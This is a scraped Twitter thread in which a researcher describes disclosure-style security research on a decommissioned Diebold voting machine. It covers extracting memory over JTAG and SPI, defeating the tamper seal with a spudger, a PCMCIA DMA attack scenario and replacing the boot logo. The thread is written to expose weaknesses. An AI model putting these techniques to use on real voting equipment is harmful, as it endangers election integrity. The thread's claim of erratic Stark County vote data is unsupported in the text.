Du kannst deine Tweets vom Web aus und über Drittapplikationen mit einem Standort versehen, wie z.B. deiner Stadt oder deinem genauen Standort. Du hast jederzeit die Möglichkeit, Standortangaben nachträglich zu löschen. Mehr erfahren
Fresh from the 2016 Election courtesy of the e-recycling program of the Great State of Ohio. Let’s see what we find, shall we?pic.twitter.com/ROgDpVfRwV
Legally purchased. No contract or end user agreement has been entered into by the researcher. Good faith security research conducted pursuant to the Librarian of Congress’s DMCA exception attached below.pic.twitter.com/RmjhTaYVYm
Manufacturer “tamper evident” seal, and origin of machine.pic.twitter.com/OcYwTmUOxT
Stark County, Ohio has one of the strangest patterns of voter data I examined, departing drastically, erratically, and inexplicably from voting norms. The area contains 375,165 people.pic.twitter.com/88idWbV08s
Building on the work of @securelyfitz at DEFCON 25 Voting Machine Hacking Village, halted CPU via the internal JTAG interface prior to boot, did forensic extraction via SPI & JTAG of EPROM and Flash memory, using @dangerousproto BPirate v3.6.
Extracted OS contents of NK.bin.
pic.twitter.com/q7TOcYLAug
We're going to have some fun with this and you're all going to learn a bit. But I can already tell you a person could walk up to one of these machines, hack it, and walk away in less than a minute, unnoticed in public leaving no trace, altering an entire county's vote total.
Inadequate physical security + DMA over PCMCIA + virus spread via Compact Flash to GEMS County totaling system, for all the Mr. Robot fans playing along at home.
We’re going to do a few of things: 1. Build a test device for the fast attack scenario, or if time and the extra $500 get the better of me, describe it in detail. 2. Demonstrate how easy it is to change votes, alter the OS, and have fun. 3. Forensically look for malware traces.
My primary goal is to forensically examine every shred of programmable memory on the device to determine if anything malicious was loaded, even if it was deleted.
And @PutinRF_Eng, let me make something clear: If malware was ever there, we will find it.pic.twitter.com/NSMHowMYlj
Americans also need to start holding @EACgov accountable. This machine is *currently* Federally certified as meeting a security standard.
Both State Secretaries of State and EAC need robust challenge processes, not reviews by industry-captured “labs.” https://www.eac.gov/file.aspx?A=aglE75KwcKu6qnU6c3qTUK5Q6%2f6GJ3TizHHVpucJCfQ%3d …
Let’s discuss the serious issue which makes these machines particularly problematic. It’s this cover on the side. You can see it’s sealed with a “tamper-evident” sticker and a lock. We’ll quickly show how those don’t actually work, and why that’s a problem.pic.twitter.com/rAey7SKxEy
Security audits of Premier Election Solutions (formerly known as Diebold) machines inevitably say: “They’re horrible insecure if you open them, but all the access ports are physically locked and have special stickers to show if they’ve been opened. So it’s totally fine.” Wrong.
That door I showed you can be opened in a few seconds, while locked & leaving the seal intact. Because the plastic is soft, and is secured in the rear only by a plastic tab, it can be opened with a popsicle stick. (Here I use a professional’s popsicle stick, a plastic spudger.)pic.twitter.com/sEX72sPnAt
Opening that grants access to two potential points of entry: a PCMCIA slot, and a telephone modem. Let’s talk about PCMCIA first, because it’s worse. PCMCIA is designed to connect high speed devices to a computer, and as a result it has what’s called DMA: “Direct Memory Access.”pic.twitter.com/slCCzr6sQO
DMA is good because it lets your computer move data around without occupying the CPU. But it’s very very bad when security is a factor, because it is so low-level it almost universally routes around almost all security features.pic.twitter.com/D4PoYBEbdU
Anyone with access to a DMA-capable peripheral connection is highly likely to be able to seize control of the machine, because the attacker can read and write memory, both disk and RAM, at will. This jeopardizes encryption schemes, OS defenses, and renders anti-malware useless.
So what could an attacker do with off the shelf technology, and that PCMCIA slot? Well, pretty much anything to they wanted. They can bypass passwords, change data, overwrite everything down to the code that loads the operating system, & plant almost impossible to find viruses.pic.twitter.com/t9WirsTckd
This machine has a memory card for the battery controller with a few Megabytes of extra space. Do you know how many civilian anti-virus programs scan the battery controller chip’s memory? None. Sophisticated malware takes root well-below the operating system, where it hides...pic.twitter.com/vkaQUMgYZk
Those locations, the deep dark obscure corners of computing are where the best hackers ply their trade. That’s where we’re going to shine a light. Later we’ll talk about how an attacker’s virus could hitch a ride to a county’s central computer, & why printed backups are useless.pic.twitter.com/nu9xngqZt9
Great Q. Some areas place machines behind curtains or booths, others rely on minimal privacy screens. A trained clandestine service operator would have specialized equipment and months of rote practice. I can already do it fairly discretely after a day.https://twitter.com/bigreebokdawg/status/1020321436047568896?s=21 …
In looking at responses, i must clarify; The point of this thread is not that we are doomed and should not vote.
It’s that we are watching.
It’s that we need every last one of us to vote. #TooBigToRig
First thing we're going to do is a simple hack, loading a custom image graphic onto the machine.
First thing’s first. We connect a probe to individual chips, extract their memory one by one, so we’re certain we have a high-quality copy of everything. This is... tedious. I’ll describe it in detail later, with lots of photos.
Let’s jump straight to the fun part. We unscrew the back cover of the machine (regular Phillips screws, not ever T6 or a security screw. Lots of interesting stuff on the board we’ll go over, but in the top right we spy an open JTAG interface. So we connect to the board.pic.twitter.com/cPUS3mlvWf
Thanks to @securelyfitz we know the board and pin outputs. So we fire up openocd, and dump everything we can access.
To simplify, what we’ve done is access a low-level debugging interface used by the people who manufacture the circuit boards. It gives us direct control over the CPU and memory. So we halt the CPU, and dump an image of all the accessible memory.
Now we're going to run through the bootchain until the Windows CE image is verified and extracted, then replace the file of the original voting machine logo (left) with our version (right).pic.twitter.com/muhl4xpmFk
Twitter ist möglicherweise überlastet oder hat einen vorübergehenden Schluckauf. Probiere es erneut oder besuche Twitter Status für weitere Informationen.
